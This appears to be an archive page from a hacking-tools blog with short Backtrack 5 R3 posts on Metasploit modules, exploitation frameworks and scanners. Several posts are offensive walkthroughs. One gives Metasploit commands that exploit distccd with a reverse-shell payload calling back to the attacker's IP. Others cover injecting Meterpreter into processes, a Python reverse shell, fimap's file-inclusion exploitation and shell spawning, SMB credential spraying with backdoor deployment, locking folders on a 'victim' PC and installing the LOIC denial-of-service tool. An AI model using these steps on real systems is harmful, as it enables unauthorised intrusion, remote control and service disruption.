Showing posts with label Backtrack 5 R3. Show all posts

Wednesday, 1 April 2015

Reflective DLL Injection Metasploit Module



Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to load a library from memory into a host process. As such, the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it loads and interacts with the host.

Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

Download: Reflective DLL Injection Exploit

VIDEO TUTORIAL : 

Tuesday, 31 March 2015

Windows Manage Memory Payload Injection



This module will inject a payload into the memory of a process. If a payload isn't selected, it defaults to a reverse x86 TCP Meterpreter. If the PID datastore option isn't specified, it injects into notepad.exe instead.

Exploit : exploit/windows/local/payload_inject

VIDEO :  
 

Tuesday, 12 August 2014

WebSploit Framework : java applet attack



WebSploit is an open source project for:

Social Engineering Works
Scan, Crawler & Analysis Web
Automatic Exploiter
Support Network Attacks
Autopwn - Used From Metasploit For Scan and Exploit Target Service
wmap - Scan, Crawler Target Used From Metasploit wmap plugin
format infector - inject reverse & bind payload into file format
phpmyadmin Scanner
CloudFlare resolver
LFI Bypasser
Apache Users Scanner
Dir Bruter
admin finder
MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
MITM - Man In The Middle Attack
Java Applet Attack
MFOD Attack Vector
USB Infection Attack
ARP Dos Attack
Web Killer Attack
Fake Update Attack
Fake Access point Attack
Wifi Honeypot
Wifi Jammer
Wifi Dos
Bluetooth POD Attack
The Java Applet Attack is considered one of the most successful and popular methods for compromising a system. It is popular because the infected Java applet is very easy to create, and any site we want can be cloned so that it loads the applet very quickly.

The Java applet Attack vector affects:

  • Windows Systems
  • Linux Systems and
  • Mac OS X 

Click here to Download WebSploit Framework 

Saturday, 19 July 2014

Xprobe2 - active OS fingerprinting tool


Xprobe2 is used to perform active OS fingerprinting on a remote target.

Download Xprobe2

Installation (BackTrack and Kali Linux have it built in)

You will need libpcap:

$ sudo apt-get install libpcap0.8-dev

You will also need g++-4.1

$ sudo apt-get install g++-4.1

Install Xprobe2

$ wget http://downloads.sourceforge.net/project/xprobe/xprobe2/Xprobe2%200.3/xprobe2-0.3.tar.gz
$ tar xzvf xprobe2-0.3.tar.gz
$ cd xprobe2-0.3/
$ ./configure CC=gcc-4.1 CXX=g++-4.1
$ make
$ sudo make install

Options

-v
Be verbose

-r
Show route to target(traceroute-like output)

-p <proto:portnum:state>
Specify portnumber (1-65535), protocol (tcp|udp) and state (closed|open).
Example: tcp:25:open, UDP:55:CLOSED

-c <configfile>
Specify config file to use.

-h
Print this help.

-o <fname>
Use logfile to log everything.

-t <time_sec>
Set the receive timeout in seconds
(default: 10 seconds)

-s <send_delay>
Set the packet-sending delay (milliseconds).

-d <debuglv>
Specify debugging level.

-D <modnum>
Disable module number <modnum>.

-M <modnum>
Enable module number <modnum>.

-L
Display modules.

-m <numofmatches>
Specify number of matches to print.

-T <portspec>
Enable TCP portscan for specified port(s).
Example: -T21-23,25,53

-U <portspec>
Enable UDP portscan for specified port(s).

-f
Force fixed round-trip time (-t opt).

-F
Generate signature (use -o to save to a file).

-X
Generate XML output and save it to logfile specified with -o.

-B
Force the TCP handshake module to try to guess an open TCP port.

-A
Perform analysis of sample packets gathered during portscan in order to detect suspicious traffic (i.e. transparent proxies, firewalls/NIDSs resetting connections).
Use with -T.

Saturday, 12 July 2014

keimpx – SMB Credential Scanner


keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

  1. Combination of user / plain-text password.
  2. Combination of user / NTLM hash.
  3. Combination of user / NTLM logon session token.

If any valid credentials have been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, and is then prompted with an interactive SMB shell where the user can:

  1. Spawn an interactive command prompt.
  2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
  3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
  4. List user details, domains and password policy.



      Saturday, 7 September 2013

      Fix msfupdate Problem


      Error : Could not find pg-0.15.0 in any of the sources. Run `bundle install` to install missing gems

      The reason for this error was that while I was running the msfupdate command it showed me an error in the pg-0.15.1 package installation.

      Solution
      • Go to this path (for 64-bit BackTrack 5 R3): root@bt: cd /opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/
      • Edit the file rbconfig.rb
      • Search for this line: CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" and remove this part: -l$(RUBY_SO_NAME)-static
      • Save

      Video :



      Wednesday, 3 April 2013

      Golismero.py Web tool in BackTrack 5 R3

      What is GoLISMERO?


      GoLISMERO is a web spider that is able to detect vulnerabilities and format the results in a way that is very useful when starting a web audit.

      What is it for?


      GoLISMERO is intended to be a first step when starting a web security audit.

      Every time we face a new URL, wouldn't it be great to obtain, easily and quickly, all the links and all the forms with their parameters, to detect possibly vulnerable URLs, and to have them presented in a way that gives us an idea of all the entry points where we could launch attacks? GoLISMERO lets us do all this.


      Click Here to Watch Video[Tutorial]



      Learning with examples


      Remember: to execute GoLismero you need Python 2.7.x or above.


      Below are several examples and case studies, which are the best way to learn to use a security tool.

      1. Getting all links and forms from a web, with all their parameters, extended format:


      GoLISMERO.py -t google.com



      2. Getting all links, in compact mode, with colorized output:


      GoLISMERO.py -c -m -t google.com



      3. Getting only links, removing CSS, JavaScript, images and mails:


      GoLISMERO.py --no-css --no-script --no-images --no-mail -c -A links -m -t google.com

      Or, reduced format:

      GoLISMERO.py -na -c -A links -m -t google.com



      4. Getting only links with params, following redirects (HTTP 302) and exporting results in HTML:


      GoLISMERO.py -c -A links --follow -F html -o results.html -m -t google.com



      The generated HTML code:



      5. Getting all links, looking for potentially vulnerable URLs and using an intermediate proxy to analyze responses. The vulnerable URLs or parameters are highlighted in red.


      GoLISMERO.py -c -A links --follow -na -x -m -t terra.com



      ZAP Proxy capturing the request:



      VIDEO :


      Tuesday, 26 March 2013

      Dorking with Fimap in BackTrack 5 R3


      fimap is a little Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection. It's currently under heavy development but it's usable.

      The goal of fimap is to improve the quality and security of your website.

      Quick News for SVN and upcoming versions



      • Bing searching module implemented in SVN! Currently broken :-O

      • SSH-Logfiles can now be scanned and exploited through SSH username!

      • You can now define which target to exploit and execute shell commands without the interactive exploit interface! (FimapNonInteractiveExec)

      • New experimental fallback plugin which you can try when just /etc/passwd (or any other read-only file) was found. (FimapPhpInfoExploit)

      • New fallback plugin for windows victims! (FimapFindFirstFileExploit)


      What works currently?



      • Check a single URL, a list of URLs, or Google results fully automatically.

      • Can identify and exploit file inclusion bugs.

        • Relative\Absolute Path Handling.

        • Tries automatically to eliminate suffixes with a null byte and other methods like dot truncation.

        • Remotefile Injection.

        • Logfile Injection. (FimapLogInjection)



      • Test and exploit multiple bugs:

        • include()

        • include_once()

        • require()

        • require_once()



      • You always define absolute pathnames in the configs. No redundant paths like:

        • ../etc/passwd

        • ../../etc/passwd

        • ../../../etc/passwd



      • Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode

      • Has an interactive exploit mode which...

        • ...can spawn a shell on vulnerable systems.

        • ...can spawn a reverse shell on vulnerable systems.

        • ...can do everything you have added in your payload-dict inside the config.py



      • Add your own payloads and paths to the config.py file.

      • Has a Harvest mode which can collect URLs from a given domain for later pentesting.

      • Goto FimapHelpPage for all features.

      • Works also on windows.

      • Can handle directories in RFI mode like:

        • <? include ($_GET["inc"] . "/content/index.html"); ?>

        • <? include ($_GET["inc"] . "_lang/index.html"); ?>

        • where Null-Byte is not possible.



      • Can use proxies.

      • Scans and exploits GET, POST and Cookies.

      • Has a very small footprint. (No senseless brute-forcing of paths, unless you need it.)

      • Can attack also windows servers! (WindowsAttack)

      • Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)


      • Non Interactive Exploiting (FimapNonInteractiveExec)


      What doesn't work yet?



      • Languages other than PHP (even though the engine is ready for others as well).


      VIDEO :



      Sunday, 24 March 2013

      Python Reverse shell


      A simple reverse shell written in Python (BSIDESLV and Defcon 20 demo).

      Download Python Reverse shell - http://adf.ly/LVvor

      VIDEO :



      Wednesday, 20 March 2013

      DistCC Daemon Command Execution


      This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

      distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
      Exploit Rank - Excellent
      CVSS Score - 9.3

      Commands :


      msfconsole

      msf > use exploit/unix/misc/distcc_exec
      msf exploit(distcc_exec) > show payloads
      msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
      msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
      msf exploit(distcc_exec) > set RHOST [TARGET IP]
      msf exploit(distcc_exec) > exploit

      VIDEO


      Vulnerability Scanner uniscan.pl in Backtrack 5 R3


      Uniscan is a vulnerability scanner for web applications, written in Perl for the Linux environment. It was developed as the final project of the computer science course of the Federal University of Pampa and is licensed under the GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).

      Features Of Uniscan:



      • Identification of system pages through a Web Crawler.

      • Use of threads in the crawler.

      • Control of the maximum number of requests made by the crawler.

      • Control of the variation of system pages identified by the Web Crawler.

      • Control of file extensions that are ignored.

      • Test of pages found via the GET method.

      • Test the forms found via the POST method.

      • Support for SSL requests (HTTPS).

      • Proxy support.

      • Generate site list using Google.

      • Generate site list using Bing.

      • Plug-in support for Crawler.

      • Plug-in support for dynamic tests.

      • Plug-in support for static tests.

      • Plug-in support for stress tests.

      • Multi-language support.

      • Web client.

      • GUI client written in perl using tk.


      Usage:

      perl ./uniscan.pl -u http://www.targetsite.com/ -qweds

      perl ./uniscan.pl -f sites.txt -bqweds


      perl ./uniscan.pl -i uniscan


      perl ./uniscan.pl -i xxx.xxx.xxx.xxx


      perl ./uniscan.pl -u https://www.targetsite.com/ -r


      VIDEO


      Tuesday, 19 March 2013

      How to lock and unlock folder in remote victim pc using metasploit

      Once you have a Meterpreter session, use the 'shell' command to get a command prompt on the target.

      Lock and unlock folder:

      Type Cacls (Folder Name) /e /p everyone:n and press Enter.

      VIDEO




      Sunday, 17 March 2013

      Windows Gather USB Drive History Metasploit Module


      This module will enumerate USB Drive history on a target host.


      Usage Information


      msf > use post/windows/gather/usb_history
      msf post(usb_history) > set SESSION [INTEGER]

      Module Options

      SESSION    The session to run this module on.
      VERBOSE    Enable detailed status messages
      WORKSPACE  Specify the workspace for this module



      How to install LOIC(Low Orbit Ion Cannon) in Backtrack 5 R3


      LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.



      1 - Install the dependencies: aptitude install git-core monodevelop

      2 - Download the loic.sh script: wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

      3 - Make a folder: mkdir <folder name>

      4 - Install: ./loic.sh install

      5 - Update: ./loic.sh update

      6 - Run LOIC: ./loic.sh run




      Saturday, 16 March 2013

      How to share folder in Backtrack 5 R3 to make accessible in Windows


      1. Open your terminal (CTRL+ALT+T) and then run this command to create a new directory "share".

      mkdir /var/www/share 

      2. Change the permissions of the share folder to 755.

      chmod -R 755 /var/www/share/ 


      3. Change the ownership of that folder to www-data.

      chown -R www-data:www-data /var/www/share/

      5. Okay, everything has been set up correctly up to this step. The next step is to activate the Apache server by running the service apache2 start command:

      root@bt:~# service apache2 start 
      * Starting web server apache2

      If you don't have apache2 installed, run the
      apt-get install apache2 command first.